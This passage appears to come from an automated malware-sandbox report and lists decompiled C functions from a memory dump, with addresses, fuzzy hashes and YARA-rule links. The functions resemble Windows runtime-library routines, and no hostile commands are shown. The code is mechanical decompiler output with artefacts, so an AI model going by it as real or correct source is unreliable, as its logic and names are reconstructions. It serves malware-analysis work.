									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04B795D0();
										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04B795D0();
										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04B6F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                    0x04b352a5
                                                                                                                                    0x04b352ad
                                                                                                                                    0x04b352b0
                                                                                                                                    0x04b352b3
                                                                                                                                    0x04b352b7
                                                                                                                                    0x04b352ba
                                                                                                                                    0x04b352bf
                                                                                                                                    0x04b352c4
                                                                                                                                    0x04b352cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b352ce
                                                                                                                                    0x04b352d9
                                                                                                                                    0x04b352dd
                                                                                                                                    0x04b352e7
                                                                                                                                    0x04b352f7
                                                                                                                                    0x04b352f9
                                                                                                                                    0x04b352fd
                                                                                                                                    0x04b90dcf
                                                                                                                                    0x04b90dd5
                                                                                                                                    0x04b90dd6
                                                                                                                                    0x04b90dd7
                                                                                                                                    0x04b90dd8
                                                                                                                                    0x04b90dd9
                                                                                                                                    0x04b90dde
                                                                                                                                    0x04b90ddf
                                                                                                                                    0x04b90de0
                                                                                                                                    0x04b90de1
                                                                                                                                    0x04b90de2
                                                                                                                                    0x04b90de5
                                                                                                                                    0x04b90dea
                                                                                                                                    0x04b90dec
                                                                                                                                    0x04b90f60
                                                                                                                                    0x04b90f64
                                                                                                                                    0x04b90f70
                                                                                                                                    0x04b90f76
                                                                                                                                    0x04b90f79
                                                                                                                                    0x04b90f79
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90f64
                                                                                                                                    0x04b90df2
                                                                                                                                    0x04b90df7
                                                                                                                                    0x04b90e04
                                                                                                                                    0x04b90e0d
                                                                                                                                    0x04b90e0d
                                                                                                                                    0x04b90e10
                                                                                                                                    0x04b90e1a
                                                                                                                                    0x04b90e1c
                                                                                                                                    0x04b90e4c
                                                                                                                                    0x04b90e52
                                                                                                                                    0x04b90e61
                                                                                                                                    0x04b90e67
                                                                                                                                    0x04b90e6b
                                                                                                                                    0x04b90e70
                                                                                                                                    0x04b90e76
                                                                                                                                    0x04b90ed7
                                                                                                                                    0x04b90edc
                                                                                                                                    0x04b90ee0
                                                                                                                                    0x04b90ee6
                                                                                                                                    0x04b90eea
                                                                                                                                    0x04b90eed
                                                                                                                                    0x04b90ef0
                                                                                                                                    0x04b90ef3
                                                                                                                                    0x04b90ef6
                                                                                                                                    0x04b90ef9
                                                                                                                                    0x04b90efe
                                                                                                                                    0x04b90f01
                                                                                                                                    0x04b90f01
                                                                                                                                    0x04b90f0b
                                                                                                                                    0x04b90f12
                                                                                                                                    0x04b90f16
                                                                                                                                    0x04b90f18
                                                                                                                                    0x04b90f1b
                                                                                                                                    0x04b90f2c
                                                                                                                                    0x04b90f31
                                                                                                                                    0x04b90f31
                                                                                                                                    0x04b90f35
                                                                                                                                    0x04b90f39
                                                                                                                                    0x04b90f3a
                                                                                                                                    0x04b90f3c
                                                                                                                                    0x04b90f3f
                                                                                                                                    0x04b90f50
                                                                                                                                    0x04b90f55
                                                                                                                                    0x04b90f55
                                                                                                                                    0x04b90f59
                                                                                                                                    0x04b352eb
                                                                                                                                    0x04b352f1
                                                                                                                                    0x04b352f1
                                                                                                                                    0x04b90e7d
                                                                                                                                    0x04b90e84
                                                                                                                                    0x04b90e88
                                                                                                                                    0x04b90e8a
                                                                                                                                    0x04b90e8d
                                                                                                                                    0x04b90e9e
                                                                                                                                    0x04b90ea3
                                                                                                                                    0x04b90ea3
                                                                                                                                    0x04b90ea7
                                                                                                                                    0x04b90eaf
                                                                                                                                    0x04b90eb3
                                                                                                                                    0x04b90eb9
                                                                                                                                    0x04b90eb9
                                                                                                                                    0x04b90ebc
                                                                                                                                    0x04b90ecd
                                                                                                                                    0x04b90ecd
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90eb3
                                                                                                                                    0x04b90e21
                                                                                                                                    0x04b90e2b
                                                                                                                                    0x04b90e2f
                                                                                                                                    0x04b90e30
                                                                                                                                    0x04b90e3a
                                                                                                                                    0x04b90e3f
                                                                                                                                    0x04b90e41
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90e47
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90e47
                                                                                                                                    0x04b90df9
                                                                                                                                    0x04b90dfe
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90dfe
                                                                                                                                    0x04b35303
                                                                                                                                    0x04b35307
                                                                                                                                    0x00000000
                                                                                                                                    0x04b35309
                                                                                                                                    0x00000000
                                                                                                                                    0x04b35309
                                                                                                                                    0x04b35307
                                                                                                                                    0x04b352e9
                                                                                                                                    0x04b352e9
                                                                                                                                    0x00000000
                                                                                                                                    0x04b352e9
                                                                                                                                    0x04b3530e
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3891c2bd3cf269b9dfc31e7166430464d7757ba78068061c7c4babb1fd8967b0
                                                                                                                                    • Instruction ID: f3bc034736d42ad7894e2194fb7ab7348d80ff6cffa27216649a90baf4012f22
                                                                                                                                    • Opcode Fuzzy Hash: 3891c2bd3cf269b9dfc31e7166430464d7757ba78068061c7c4babb1fd8967b0
                                                                                                                                    • Instruction Fuzzy Hash: B551DE71205742AFEB20EF69C980B27BBE4FF84714F1409AEE49587651E7B4F840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B4EF40, Relevance: .1, Instructions: 147COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E04B4EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04B39080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04B32D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                                    0x04b4ef4b
                                                                                                                                    0x04b4ef4d
                                                                                                                                    0x04b4ef57
                                                                                                                                    0x04b4f0bd
                                                                                                                                    0x04b4f0c2
                                                                                                                                    0x04b4f0d2
                                                                                                                                    0x04b4f0d2
                                                                                                                                    0x04b4f0c2
                                                                                                                                    0x04b4ef5d
                                                                                                                                    0x04b4ef5f
                                                                                                                                    0x04b4ef67
                                                                                                                                    0x04b4ef6a
                                                                                                                                    0x04b4ef6d
                                                                                                                                    0x04b4ef74
                                                                                                                                    0x04b4ef7f
                                                                                                                                    0x04b4ef82
                                                                                                                                    0x04b4ef82
                                                                                                                                    0x04b4ef86
                                                                                                                                    0x04b4ef88
                                                                                                                                    0x04b4ef8c
                                                                                                                                    0x04b4ef8f
                                                                                                                                    0x04b4ef8f
                                                                                                                                    0x04b4ef8f
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4ef91
                                                                                                                                    0x04b4ef93
                                                                                                                                    0x04b4efc4
                                                                                                                                    0x04b4efc4
                                                                                                                                    0x04b4efc4
                                                                                                                                    0x04b4efca
                                                                                                                                    0x04b4efd0
                                                                                                                                    0x04b4f0a6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f0af
                                                                                                                                    0x04b9bb06
                                                                                                                                    0x04b9bb0a
                                                                                                                                    0x04b4f0b5
                                                                                                                                    0x04b4f0b5
                                                                                                                                    0x04b4f0b5
                                                                                                                                    0x04b4f0b5
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efd6
                                                                                                                                    0x04b4efd9
                                                                                                                                    0x04b4f0de
                                                                                                                                    0x04b4f0e2
                                                                                                                                    0x04b4efdf
                                                                                                                                    0x04b4efdf
                                                                                                                                    0x04b4efdf
                                                                                                                                    0x04b4efe5
                                                                                                                                    0x04b9bafc
                                                                                                                                    0x04b9bafc
                                                                                                                                    0x04b4efe5
                                                                                                                                    0x04b4efeb
                                                                                                                                    0x04b4efed
                                                                                                                                    0x04b4f00f
                                                                                                                                    0x04b4f011
                                                                                                                                    0x04b4f01a
                                                                                                                                    0x04b4f01d
                                                                                                                                    0x04b4f021
                                                                                                                                    0x04b4f028
                                                                                                                                    0x04b4f029
                                                                                                                                    0x04b4f029
                                                                                                                                    0x04b4f02c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f02c
                                                                                                                                    0x04b4eff3
                                                                                                                                    0x04b4eff9
                                                                                                                                    0x04b4f0ea
                                                                                                                                    0x04b4f0ed
                                                                                                                                    0x04b4f0ef
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f0ef
                                                                                                                                    0x04b4f003
                                                                                                                                    0x04b9bb12
                                                                                                                                    0x04b4f045
                                                                                                                                    0x04b4f049
                                                                                                                                    0x04b4f051
                                                                                                                                    0x04b4f09e
                                                                                                                                    0x04b4f0a0
                                                                                                                                    0x04b4f0a0
                                                                                                                                    0x04b4f09e
                                                                                                                                    0x04b4f053
                                                                                                                                    0x04b4f064
                                                                                                                                    0x04b4f064
                                                                                                                                    0x04b4f06b
                                                                                                                                    0x04b9bb1a
                                                                                                                                    0x04b9bb1a
                                                                                                                                    0x04b4f071
                                                                                                                                    0x04b4f071
                                                                                                                                    0x04b4f07d
                                                                                                                                    0x04b4f082
                                                                                                                                    0x04b4f08f
                                                                                                                                    0x04b4f08f
                                                                                                                                    0x04b4f009
                                                                                                                                    0x04b4f00d
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f00d
                                                                                                                                    0x04b4efd0
                                                                                                                                    0x04b4ef97
                                                                                                                                    0x04b4efa5
                                                                                                                                    0x04b4efaa
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efac
                                                                                                                                    0x04b4efac
                                                                                                                                    0x04b4efac
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efb2
                                                                                                                                    0x04b4f036
                                                                                                                                    0x04b4f03a
                                                                                                                                    0x04b4f040
                                                                                                                                    0x04b4f090
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f092
                                                                                                                                    0x04b4f042
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f042
                                                                                                                                    0x04b4efb7
                                                                                                                                    0x04b4efb9
                                                                                                                                    0x04b4efbc
                                                                                                                                    0x04b4efb0
                                                                                                                                    0x04b4efb0
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efbe
                                                                                                                                    0x04b4efbe
                                                                                                                                    0x04b4efc1
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efc1
                                                                                                                                    0x04b4efbc
                                                                                                                                    0x04b4efaa
                                                                                                                                    0x04b4ef91

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                    • Instruction ID: 8a301c1b7fafb278d8f802b8499df9a7816651195ac31e1daa6d3a95a7e4002e
                                                                                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                    • Instruction Fuzzy Hash: 8D51BD30A04249AFEB24CF68C190BAEBBB1FFC5314F1881E8D54597381D375B989E7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C0740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E04C0740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04B8D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04B7F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04B7F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                                    0x04c0740d
                                                                                                                                    0x04c0740d
                                                                                                                                    0x04c07412
                                                                                                                                    0x04c07413
                                                                                                                                    0x04c07416
                                                                                                                                    0x04c07418
                                                                                                                                    0x04c0741c
                                                                                                                                    0x04c0741f
                                                                                                                                    0x04c07422
                                                                                                                                    0x04c07422
                                                                                                                                    0x04c07428
                                                                                                                                    0x04c0742a
                                                                                                                                    0x04c0742a
                                                                                                                                    0x04c07451
                                                                                                                                    0x04c07432
                                                                                                                                    0x04c0744f
                                                                                                                                    0x04c0744f
                                                                                                                                    0x00000000
                                                                                                                                    0x04c07434
                                                                                                                                    0x04c07438
                                                                                                                                    0x04c07443
                                                                                                                                    0x04c07517
                                                                                                                                    0x04c07517
                                                                                                                                    0x04c0751a
                                                                                                                                    0x04c07535
                                                                                                                                    0x04c07520
                                                                                                                                    0x04c07527
                                                                                                                                    0x04c0752c
                                                                                                                                    0x04c07531
                                                                                                                                    0x04c07533
                                                                                                                                    0x00000000
                                                                                                                                    0x04c07533
                                                                                                                                    0x00000000
                                                                                                                                    0x04c07531
                                                                                                                                    0x04c0754b
                                                                                                                                    0x04c0754f
                                                                                                                                    0x04c0755c
                                                                                                                                    0x04c0755c
                                                                                                                                    0x04c0755f
                                                                                                                                    0x04c07560
                                                                                                                                    0x04c07561
                                                                                                                                    0x04c07562
                                                                                                                                    0x04c07563
                                                                                                                                    0x04c07568
                                                                                                                                    0x04c0756a
                                                                                                                                    0x04c0756c
                                                                                                                                    0x04c0756d
                                                                                                                                    0x04c0756d
                                                                                                                                    0x04c0756f
                                                                                                                                    0x04c07572
                                                                                                                                    0x04c07574
                                                                                                                                    0x04c07577
                                                                                                                                    0x04c0757c
                                                                                                                                    0x04c0757f
                                                                                                                                    0x00000000
                                                                                                                                    0x04c07551
                                                                                                                                    0x04c07551
                                                                                                                                    0x04c07551
                                                                                                                                    0x04c07553
                                                                                                                                    0x04c07553
                                                                                                                                    0x04c07449
                                                                                                                                    0x04c07449
                                                                                                                                    0x04c0744c
                                                                                                                                    0x04c0744c
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0744c
                                                                                                                                    0x04c07443
                                                                                                                                    0x04c0750e
                                                                                                                                    0x04c07514
                                                                                                                                    0x04c07514
                                                                                                                                    0x04c07455
                                                                                                                                    0x04c07469
                                                                                                                                    0x04c0746d
                                                                                                                                    0x00000000
                                                                                                                                    0x04c07473
                                                                                                                                    0x04c07473
                                                                                                                                    0x04c07476
                                                                                                                                    0x04c07480
                                                                                                                                    0x04c07484
                                                                                                                                    0x04c0748e
                                                                                                                                    0x04c07493
                                                                                                                                    0x04c07493
                                                                                                                                    0x04c07496
                                                                                                                                    0x04c07499
                                                                                                                                    0x04c074a1
                                                                                                                                    0x04c074b1
                                                                                                                                    0x04c074b5
                                                                                                                                    0x00000000
                                                                                                                                    0x04c074bb
                                                                                                                                    0x04c074c1
                                                                                                                                    0x04c074c1
                                                                                                                                    0x04c074c4
                                                                                                                                    0x04c074c5
                                                                                                                                    0x04c074c6
                                                                                                                                    0x04c074c7
                                                                                                                                    0x04c074c8
                                                                                                                                    0x04c074cd
                                                                                                                                    0x00000000
                                                                                                                                    0x04c074d3
                                                                                                                                    0x04c074d3
                                                                                                                                    0x04c074d6
                                                                                                                                    0x04c074d8
                                                                                                                                    0x04c074db
                                                                                                                                    0x04c074dd
                                                                                                                                    0x04c074e0
                                                                                                                                    0x04c074e7
                                                                                                                                    0x04c074ee
                                                                                                                                    0x04c074ee
                                                                                                                                    0x04c074f4
                                                                                                                                    0x04c074f9
                                                                                                                                    0x00000000
                                                                                                                                    0x04c074fb
                                                                                                                                    0x04c074fb
                                                                                                                                    0x04c074fd
                                                                                                                                    0x04c07500
                                                                                                                                    0x04c07503
                                                                                                                                    0x04c07505
                                                                                                                                    0x04c07505
                                                                                                                                    0x04c074f9
                                                                                                                                    0x00000000
                                                                                                                                    0x04c074cd
                                                                                                                                    0x04c074b5
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                    • Instruction ID: 3e0a7b40df1010eb2d5d7247298e03b5f0664a32badef4aaad6ef0091c21830a
                                                                                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                    • Instruction Fuzzy Hash: 67516E71601606EFDB19CF54C480A96BBB6FF45304F19C1AAE9089F252E371FA46CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B73D43, Relevance: .1, Instructions: 106COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B73D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04B47B60(0, _t61, 0x4b111c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04B47B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04B54620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                    0x04b73d4c
                                                                                                                                    0x04b73d50
                                                                                                                                    0x04b73d55
                                                                                                                                    0x04b73d5e
                                                                                                                                    0x04bae79a
                                                                                                                                    0x00000000
                                                                                                                                    0x04bae79a
                                                                                                                                    0x04b73d68
                                                                                                                                    0x04bae789
                                                                                                                                    0x04b73d9d
                                                                                                                                    0x04b73da3
                                                                                                                                    0x04b73daf
                                                                                                                                    0x04b73db5
                                                                                                                                    0x04b73dbc
                                                                                                                                    0x04b73dc4
                                                                                                                                    0x04b73dc9
                                                                                                                                    0x04b73dce
                                                                                                                                    0x04bae7ae
                                                                                                                                    0x04bae7ae
                                                                                                                                    0x04b73dde
                                                                                                                                    0x04b73de2
                                                                                                                                    0x04b73de7
                                                                                                                                    0x04b73e0d
                                                                                                                                    0x04b73e13
                                                                                                                                    0x04b73e16
                                                                                                                                    0x04b73e1e
                                                                                                                                    0x04b73e25
                                                                                                                                    0x04b73e28
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b73e2a
                                                                                                                                    0x04b73e2f
                                                                                                                                    0x04b73e37
                                                                                                                                    0x04b73e37
                                                                                                                                    0x00000000
                                                                                                                                    0x04b73e37
                                                                                                                                    0x04b73e31
